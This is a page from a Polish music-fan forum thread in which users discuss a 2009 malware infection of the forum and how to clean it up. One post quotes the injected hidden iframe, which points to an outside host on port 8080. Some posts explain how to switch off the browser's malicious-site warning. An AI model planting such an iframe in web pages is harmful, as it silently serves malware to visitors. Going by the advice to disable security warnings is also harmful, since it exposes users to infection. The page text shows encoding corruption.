´╗┐ Depeche Mode - Zobacz w─ůtek - UWAGA WIRUS NA FORUM !
 




Utw├│rz nowy w─ůtek Odpowiedz w w─ůtku  [ Posty: 84 ]  Przejd┼║ na stron─Ö Poprzednia strona  1, 2, 3, 4, 5  Nast─Öpna strona
UWAGA WIRUS NA FORUM ! 
Autor Wiadomo┼Ť─ç
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): Pt cze 24, 2005 11:45 am
Posty: 2637
Lokalizacja: Ostrow Wlkp.
 
Post 
Obrazek

Ten komunikat mozna prosto wylaczyc:

1. menu Narzedzia -> Opcje...

2. ikonka BEZPIECZENSTWO

3. Odznaczamy "Powiadom o obecnosci na witrynie stwarzajacej zagrozenia"

To pozycja zdajesie druga od gory.


Pt cze 19, 2009 4:18 am Zobacz profil

Do┼é─ůczy┼é(a): So pa┼║ 25, 2008 15:23 pm
Posty: 90
 
Post 
ale tu chyba nie chodzi o 'odznaczenie' skutku tylko o wyleczenie przyczyny...


Pt cze 19, 2009 8:22 am Zobacz profil
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): Cz wrz 11, 2008 15:21 pm
Posty: 46
Lokalizacja: ┼Ťl─ůsk
 
Post 
by┼éo wyzej ju┼╝ ale to dla admin├│w http://www.searchengines.pl/Infekcja-hi ... 24457.html ,niech zabezpiecz─ů forum ,tu pare narzedzi :)


Pt cze 19, 2009 13:10 pm Zobacz profil WWW
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): Cz sty 22, 2009 15:13 pm
Posty: 211
Lokalizacja: Amongst The Ruins
 
Post 
Errata, chodzilo o Windows Defendera, nie Bitdefendera, takze nic tu sie z niczym nie gryzie. Tak czy owak przejechalem komputer Kasperskim online i nic nie wykryl . Wniosek - Opera rox. Ale teraz na wszelki wypadek pisze z Browser Appliance i zdejmuje kominiare.


Pt cze 19, 2009 14:19 pm Zobacz profil
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): Pt maja 15, 2009 10:35 am
Posty: 248
Lokalizacja: warszawa
 
Post 
komunikat sie pojawia tylko w firefoxie w operze wsio hula


Pt cze 19, 2009 14:34 pm Zobacz profil
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): N wrz 21, 2008 22:21 pm
Posty: 24
Lokalizacja: Poznań
 
Post 
Wydaje mi si─Ö, ┼╝e pojawi┼é si─Ö na forum jaki┼Ť dodatek JavaScriptowy, kt├│ry jest zaliczany do grona podejrzanych - i to nie przez Firefoxa, ale przez Googla (FF tylko m├│wi, co m├│ powiedzia┼é Google).

http://safebrowsing.clients.google.com/ ... /index.php

Na tej stronie można się dowiedzieć paru szczegółów.

Jestem za usuni─Öciem problemu, nie za wy┼é─ůczaniem ostrze┼╝enia. Mog─Ö pom├│c w analizie problemu.


Pt cze 19, 2009 17:47 pm Zobacz profil WWW
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): So sie 30, 2008 21:37 pm
Posty: 635
 
Post 
pojawił się: JS.Downloader

oraz

Cytuj:
<iframe src="http://torrentoreactor.net:8080/index.php" width=100 height=0 style="visibility: hidden"></iframe>


w dolnej cz─Ö┼Ťci ┼║r├│d┼éa strony


Pt cze 19, 2009 19:00 pm Zobacz profil WWW

Do┼é─ůczy┼é(a): So kwi 18, 2009 18:38 pm
Posty: 263
Lokalizacja: Olsztyn
 
Post 
Mam Noda32,gdy dzis chciałem wejsc na forum wywalił mi trojana...heee


Pt cze 19, 2009 19:41 pm Zobacz profil
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): Cz maja 21, 2009 21:22 pm
Posty: 23
Lokalizacja: nirvana...
 
Post 
A mi zwyk┼éy ava┼Ťcik wyje, ┼╝e wykry┼é wirusa, ale tylko na stronie g┼é├│wnej. Na innych nic si─Ö nie dzieje.


Pt cze 19, 2009 20:02 pm Zobacz profil

Do┼é─ůczy┼é(a): ┼Ür pa┼║ 13, 2004 21:31 pm
Posty: 4
Lokalizacja: glivice
 
Post wirus?
witam drodzy moderatorzy
zrobicie co┼Ť z wirusami na stronie g┼éownej? kaspersky si─Ö broni ale jak d┼éugo
pozdrawiam


Pt cze 19, 2009 21:12 pm Zobacz profil
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): ┼Ür lip 09, 2003 8:00 am
Posty: 695
Lokalizacja: Gdańsk
 
Post 
Wirus usuwany by┼é ju┼╝ wielokrotnie, serwer te┼╝ by┼é dodatkowo zabezpieczany - ale to cholerstwo ci─ůgle w┼éazi :?


Pt cze 19, 2009 22:45 pm Zobacz profil WWW
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): So sie 30, 2008 21:37 pm
Posty: 635
 
Post 
logi serwera, dost─Öpu -> mo┼╝e tam znajdziecie chocia┼╝ jakie┼Ť poszlaki

ukryte "iframe" zawieraj─ů, zawiera┼éy adresy stron-> blokada dost─Öpu do forum przez IP, zawsze co┼Ť na pocz─ůtek

najlepiej to przej┼Ťcie na najnowsz─ů wersj─Ö phpBB, w starym du┼╝o luk by┼éo i nadal jest (w ko┼äcu ta wersja silnika zosta┼éa wydana nieca┼ée 8 lat temu)


Pt cze 19, 2009 23:17 pm Zobacz profil WWW
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): Pn lip 28, 2003 20:12 pm
Posty: 4177
Lokalizacja: Chomicz├│wka
 
Post 
Czy mozna jakos zlikwidowac blokade z Firefox'a?


So cze 20, 2009 17:37 pm Zobacz profil
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): So sie 30, 2008 21:37 pm
Posty: 635
 
Post 
przej┼Ťcie na IE tam nie ma ┼╝adnych blokad, IE jest przyjazny "internetowym ┼Ťmieciom" :lol:

a w firefox -> pierwszy post @Szamana u g├│ry


So cze 20, 2009 18:25 pm Zobacz profil WWW
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): Cz sty 22, 2009 15:13 pm
Posty: 211
Lokalizacja: Amongst The Ruins
 
Post 
safebrowsing.clients.google.com napisał(a):
Robot Google po raz ostatni odwiedzi┼é t─Ö witryn─Ö 2009-06-20, a ostatni raz podejrzana tre┼Ť─ç zosta┼éa w niej wykryta 2009-06-17.

Czy to znaczy, ┼╝e ju┼╝ jest bezpieczno? Poza tym, sorry za sarkazm, ale jak s┼éysz─Ö te pytania jak "zlikwidowa─ç blokad─Ö" i wujk├│w dobrych rad polecaj─ůcych przej┼Ťcie na dziurawe przegl─ůdarki lub wy┼é─ůczenie zabezpiecze┼ä to nie wiem czy ┼Ťmia─ç si─Ö czy p┼éaka─ç. Jak ju┼╝ kto┼Ť koniecznie chce ignorowa─ç ostrze┼╝enia, to przecie┼╝ w Firefoksie jak wyskakuje ten czerwony alert jest opcja z wyra┼║nym napisem w j─Özyku polskim "zignoruj to ostrze┼╝enie", no lito┼Ťci. Ale jak na co┼Ť przechodzi─ç z Firefoksa to raczej na Oper─Ö - ma lepsze statystyki bezpiecze┼ästwa i najszybciej ┼éatane dziury. Na strony ewidentnie niebezpieczne najlepsze jest Browser Appliance: http://www.vmware.com/appliances/directory/80 czyli przegl─ůdarka w odr─Öbnym od Windowsa wirtualnym ┼Ťrodowisku.


Pn cze 22, 2009 0:17 am Zobacz profil
 
Post 
czyli co...??
juz po wirusie???


Wt cze 23, 2009 21:13 pm
aDMinistrator

Do┼é─ůczy┼é(a): Wt lip 08, 2003 22:53 pm
Posty: 2580
 
Post 
na razie tak


Wt cze 23, 2009 22:44 pm Zobacz profil
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): ┼Ür maja 09, 2007 0:29 am
Posty: 130
Lokalizacja: another state of mind
 
Post 
Ufff....dwa dni bez forum to za wiele ;)


Śr cze 24, 2009 1:45 am Zobacz profil

Do┼é─ůczy┼é(a): So pa┼║ 25, 2008 15:23 pm
Posty: 90
 
Post 
widz─Ö, ┼╝e chyba najwi─Öksze 'obrazenia' odnioslam - bo skonczy┼éo si─Ö formatem :/ - chyba, ┼╝e to zbieg okoliczno┼Ťci.. ale po 3 latach nale┼╝a┼éo sie :)


Cz cze 25, 2009 11:29 am Zobacz profil
Avatar u┼╝ytkownika

Do┼é─ůczy┼é(a): Pt lis 21, 2003 14:51 pm
Posty: 1266
Lokalizacja: Białystok
 
Post 
i mi po wizycie na forum system odpalał się tylko w trybie awaryjnym, ale gruntowny skan systemu pomógł, a przy okazji zrezygnowałem z avasta, który nie zabezpieczył kompa przed atakiem


Cz lip 02, 2009 11:03 am Zobacz profil
Wy┼Ťwietl posty nie starsze ni┼╝:  Sortuj wg  
Utw├│rz nowy w─ůtek Odpowiedz w w─ůtku  [ Posty: 84 ]  Przejd┼║ na stron─Ö Poprzednia strona  1, 2, 3, 4, 5  Nast─Öpna strona


Kto przegl─ůda forum

U┼╝ytkownicy przegl─ůdaj─ůcy ten dzia┼é: Brak zidentyfikowanych u┼╝ytkownik├│w i 2 go┼Ťci


Nie mo┼╝esz rozpoczyna─ç nowych w─ůtk├│w
Nie mo┼╝esz odpowiada─ç w w─ůtkach
Nie mo┼╝esz edytowa─ç swoich post├│w
Nie mo┼╝esz usuwa─ç swoich post├│w

Szukaj:
Skocz do:  
Powered by phpBB © phpBB Group.
Designed by (c) 2002 Sven Plaggemeier www.depechemode.de, modified by PFDM Team